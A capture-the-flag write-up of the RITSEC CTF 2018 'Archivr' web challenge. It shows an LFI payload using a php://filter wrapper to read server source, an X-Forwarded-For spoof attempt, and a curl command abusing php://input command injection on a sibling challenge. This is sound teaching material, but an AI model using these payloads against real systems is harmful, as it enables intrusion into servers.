CTFtime.org / RITSEC CTF 2018 / Archivr / Writeup

# Archivr 300

My team solved all the other web challenges. This was the only one left.

We did not solve this challenge during the CTF because I'm stupid and forgot how regex work :))))))).

Anyways I think it will make for a good writeup anyways. Enjoy.

![alt text](1.png "Chall")

## Recon

![alt text](2.png "Upload")

We can upload any file we want. Lets try upload shell.php

![alt text](4.png "Download")

The extension gets removed and replaced with .dat.

![alt text](3.png "Download")

We can dowload the file here if we enter `1542616333.dat`

Okay let's try some more extensions and figure out which ones are useful.

![alt text](5.png "Download")

Left side is upload filename, right side is filename returned by server.

Moving on. Not much else to do here as the file is just returned to us and not displayed.

## Dirb
Running dirb we get some new paths.

![alt text](6.png "Download")

Cool, we have found the upload directory. Let's see if we can browse our file.

```
/uploads/1542616333.dat (404)
```

Okay maybe that's not the correct folder.

## Exploiting LFI Wrappers
Using this payload we can view the source code of the upload.php file as the input is not sanitized correctly.

`http://fun.ritsec.club:8004/index.php?page=php://filter/convert.base64-encode/resource=upload`

![alt text](11.png "Download")

Decoding the base64 we get:

![alt text](7.png "Download")

This is the code for the download page:

![alt text](8.png "Download")

So the upload folder is
```
uploads/md5(REMOTE_ADDR)/md5(time()).ext
```
## The hunt for the REMOTE_ADDR IP
In PHP `$_SERVER['REMOTE_ADDR']` returns the IP address in the format X.X.X.X of the user visiting the website.

What's different with this challenge is that the server is running inside docker (most likely) and behind a reverse proxy.

![alt text](apache404.png "Download")

If we visit a page that does not exist. We see that the web server is running apache.

![alt text](nginx.png "Download")

But if we view the header of the request it says nginx.

me ---> nginx (port 8003) ---- > apache (port 80)

Let's try some obvious ones as IP:
```
127.0.0.1
my remote ip
0.0.0.0
54.166.0.85 (ip of ritsec website)
```

None of these worked.... Bruteforce is not a option as we don't know in which range the ip is located.
### Wild idea: Spoofing The X-Forwarded-For (XFF) HTTP header field
I tried to add a header field with a custom IP to see if we can spoof remote address. This did not work and I never expected it to work.

```
X-Forwarded-For: 127.0.0.1
```

### Thinking outside the box: Exploiting another challenge
Remember how we had command injection in Lazy Dev. We know the setup of the CTF should be very similar.

```
curl -d "" -X POST http://fun.ritsec.club:8007/devsrule.php?magic=php://input
```
![alt text](9.png "Download")

Remote address of lazy dev is `10.0.10.254`.

Maybe it's the same for Archivr.

![alt text](10.png "Download")

Yaayy! We've found something. Instead of a 404 we get a forbidden (403).

## Create a payload
payload.php
```php

Original writeup (https://github.com/flawwan/CTF-Writeups/blob/master/ritsec/archivr/writeup.md).

Archivr

Comments

Sign in with